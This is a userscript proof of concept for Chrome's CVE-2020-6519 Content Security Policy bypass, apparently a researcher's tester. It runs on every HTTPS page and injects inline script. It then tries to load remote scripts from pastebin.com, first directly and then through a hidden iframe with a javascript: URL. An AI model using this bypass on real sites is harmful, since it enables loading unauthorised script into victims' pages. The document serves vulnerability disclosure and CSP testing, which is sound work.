// ==UserScript==
// @name EXPLOIT-CVE-2020-6519
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author Gal Weizman ([email protected])
// @match https://*/*
// @grant none
// ==/UserScript==
/**
 * Self-contained CSP probe for CVE-2020-6519. check() stringifies this
 * function and injects it as an inline <script> into the page, so everything
 * in here runs under the page's own Content Security Policy and must not
 * depend on anything from the surrounding userscript scope.
 *
 * Reported outcomes (banner div#a plus console):
 *  - fail=true : the inline copy never ran (page CSP blocked inline script);
 *                reported as a well-configured CSP.
 *  - otherwise : a plain remote <script> load is attempted first. If the CSP
 *                lets it through, the CSP is flagged as misconfigured and the
 *                CVE test is skipped; if it is blocked, exploit() runs the
 *                javascript:-URL iframe test.
 *
 * Defender notes: a script-src without unsafe-inline (so this probe itself
 * cannot run) is the outcome the probe rewards; the Chrome major versions it
 * treats as affected are 73..83 (see getIsVulnerable). Updating Chrome past
 * that range and tightening script-src are the two independent mitigations
 * the three messages below distinguish.
 *
 * @param {boolean} [fail=false] - true only when check() calls this directly
 *   because the injected copy did not set top._CVE_START within 1500 ms.
 */
const cve_entire_func = function (fail = false) {
  // Marker read by check(): proves the injected copy executed in page context.
  // NOTE(review): @match covers frames too; in a cross-origin frame this write
  // to top throws a SecurityError — confirm whether @noframes is intended.
  top._CVE_START = true;

  // The CVE-2020-6519 test proper: a hidden iframe whose src is a javascript:
  // URL. Whether the page CSP governs the script that URL runs is the question.
  function exploit () {
    message ('start running exploit');
    // The payload is evaluated inside the iframe, so it can only reach these
    // helpers through `top`.
    top._MESSAGE = message;
    top._CVE_URL = 'https://pastebin.com/raw/XpHsfXJQ';
    // onload of the remote script: it loaded although the page CSP should
    // have blocked it (the page's own framing of an unpatched Chrome).
    top._xxx = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}"; top._MESSAGE("script was successfully fetched from https://pastebin.com/raw/XpHsfXJQ even though Content Security Policy does not allow it! 😥👎🏻😭"); };
    // onerror of the remote script: the CSP held inside the iframe as well.
    top._yyy = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}"; top._MESSAGE("script failed to be fetched from https://pastebin.com/raw/XpHsfXJQ thanks to this Chrome being patched for CVE-2020-6519! 🥳👍🏻😁 (but this website's CSP is still not well configured though...)"); };
    // Script text run in the iframe: records that it ran (top.SUCCESS), then
    // tries to load the remote script and reports through the two callbacks.
    // Template content is left at column 0 on purpose — it is the string.
    var payload = `
top.SUCCESS = true;
var s = document.createElement("script");
s.src = top._CVE_URL;
s.onload = top._xxx;
s.onerror = top._yyy;
document.body.appendChild(s);
`;
    // Vector under test: javascript: URL as iframe src, inserted into the
    // hidden container via innerHTML.
    div2.innerHTML +=
      "<iframe id='_XXX' style='display:none' src='javascript:" +
      payload +
      "'></iframe>";
    // Fallback: if the javascript: navigation did not run the payload
    // (top.SUCCESS still unset), evaluate it in the iframe's window directly.
    // `_XXX` resolves to the iframe through named window access by id.
    // NOTE(review): this timer has no delay; whether the javascript: URL has
    // already executed by the time it fires depends on scheduling — confirm.
    setTimeout (() => {
      if (!top.SUCCESS) {
        _XXX.contentWindow.eval (payload);
      }
    });
    // Closing messages after the remote load has had 500 ms to settle.
    setTimeout (() => {
      message (
        'in case exploitation succeeded - an alert message originated by the forbidden script should pop up'
      );
      message ('finish testing exploitability');
    }, 500);
  }

  // Injects the banner stylesheet. The element id CVE_STYLE is what the
  // payload callbacks reach as top.CVE_STYLE (named window access).
  // @param {string} [color='greenyellow'] - banner background colour.
  function css (color = 'greenyellow') {
    const content = `div.sticky {position: -webkit-sticky;position: sticky;top: 0;padding: 50px;background-color: ${color};font-size: 20px;}`;
    const style = document.createElement ('style');
    style.id = 'CVE_STYLE';
    style.textContent = content;
    document.head.appendChild (style);
  }

  // Runs only when the plain remote-script probe was blocked: shows the
  // banner and the hidden container, then runs the CVE test.
  function start () {
    message ('start testing exploitability');
    document.body.prepend (div);
    document.body.prepend (div2);
    css ();
    exploit ();
  }

  // Logs all arguments to the console and appends them as one line to the
  // banner (div#a). innerText is used, so the text is not parsed as HTML.
  function message () {
    const args = [].slice.call (arguments);
    console.log.apply (null, ['CVE-2020-6519-exploit: '].concat (args));
    const p = document.createElement ('li');
    p.innerText = args.join (' ');
    div.appendChild (p);
  }

  // Memoized UA sniff: takes the major version from the first UA token that
  // starts with "Chrome" and reports it as affected when 72 < major < 84.
  // Informational only — start() calls exploit() regardless of this result.
  // NOTE: parseInt is called without a radix; Chromium-derived browsers that
  // carry a Chrome/ token are classified by that same number.
  // @returns {boolean | undefined} undefined when no Chrome token is present.
  function getIsVulnerable () {
    if (isVulnerable !== undefined) return isVulnerable;
    const ua = navigator.userAgent;
    message ('User Agent: ', ua);
    const uaParts = ua.split (' ');
    for (var i = 0; i < uaParts.length; i++) {
      if (0 !== uaParts[i].indexOf ('Chrome')) continue;
      const version = uaParts[i].replace ('Chrome/', '').split ('.')[0];
      isVulnerable = parseInt (version) < 84 && parseInt (version) > 72;
      message (
        'Chrome',
        isVulnerable ? 'is' : 'is not',
        'vulnerable to CVE-2020-6519',
        isVulnerable ? '😥' : '😁',
        '(version',
        version,
        'major)'
      );
      break;
    }
    return isVulnerable;
  }

  // Shared DOM handles: div#a is the visible banner, div#b the hidden
  // container that receives the test iframe; isVulnerable caches the UA check.
  let div, div2, isVulnerable;

  // Builds the banner elements and runs the first probe: a plain remote
  // <script> load. onload => the page CSP already allows that origin, so it is
  // reported as misconfigured and the CVE test is skipped; onerror => the CSP
  // blocked it and start() runs the CVE test. With fail=true (the inline copy
  // itself was blocked) only the banner and a success message are shown.
  function init () {
    div2 = document.createElement ('div');
    div2.id = 'b';
    div2.style.display = 'none';
    div = document.createElement ('div');
    div.id = 'a';
    div.setAttribute ('class', 'sticky');
    const b = document.createElement ('b');
    b.innerText = 'CVE-2020-6519-exploit: ';
    div.appendChild (b);
    //div.setAttribute('dir', 'rtl');
    isVulnerable = getIsVulnerable ();
    if (fail) {
      // Reached only from check()'s timer: inline script never ran.
      document.body.prepend (div);
      document.body.prepend (div2);
      css ();
      message (
        'script failed to load from https://pastebin.com/raw/XpHsfXJQ thanks to this website\'s Content Security Policy not allowing unsafe execution of scripts! 👏🏻🎉👏🏻🎉👏🏻'
      );
      return;
    }
    // Baseline probe: does the page CSP already permit a remote script from
    // this origin? If so, no browser bug is needed to load third-party script.
    const s = document.createElement ('script');
    s.src = 'https://pastebin.com/raw/95f4NkAL';
    s.onload = () => {
      document.body.prepend (div);
      document.body.prepend (div2);
      css ('red');
      message (
        'this website is vulnerable due to poorley configured Content Security Policy'
      );
      message (
        'therefore, there is no reason to even check whether CVE-2020-6519 is exploitable or not - loading unwanted scripts can be done without it 🙄🙄🙄'
      );
    };
    s.onerror = () => {
      start ();
    };
    document.head.appendChild (s);
  }

  init ();
};
/**
 * Entry point. Serializes cve_entire_func into an inline <script> in the page
 * so that the page's own CSP decides whether it runs, then arms a 1500 ms
 * timer: if the injected copy never set top._CVE_START, the function is called
 * directly with fail=true so the "inline script blocked" result is still
 * reported.
 */
function check () {
  const s = document.createElement ('script');
  // Function.prototype.toString turns the probe into source text; the probe
  // therefore cannot close over anything defined in this scope.
  s.textContent = '(' + cve_entire_func + '())';
  top._CVE_START = false;
  setTimeout (() => {
    // NOTE(review): reads the bare global _CVE_START on this frame's window
    // while the marker is written on top — only equivalent when this frame is
    // top; confirm, or read top._CVE_START here as well.
    if (!_CVE_START) cve_entire_func (true);
  }, 1500);
  document.head.appendChild (s);
}
// Run the check as soon as the userscript is evaluated.
(() => {
  check ();
})();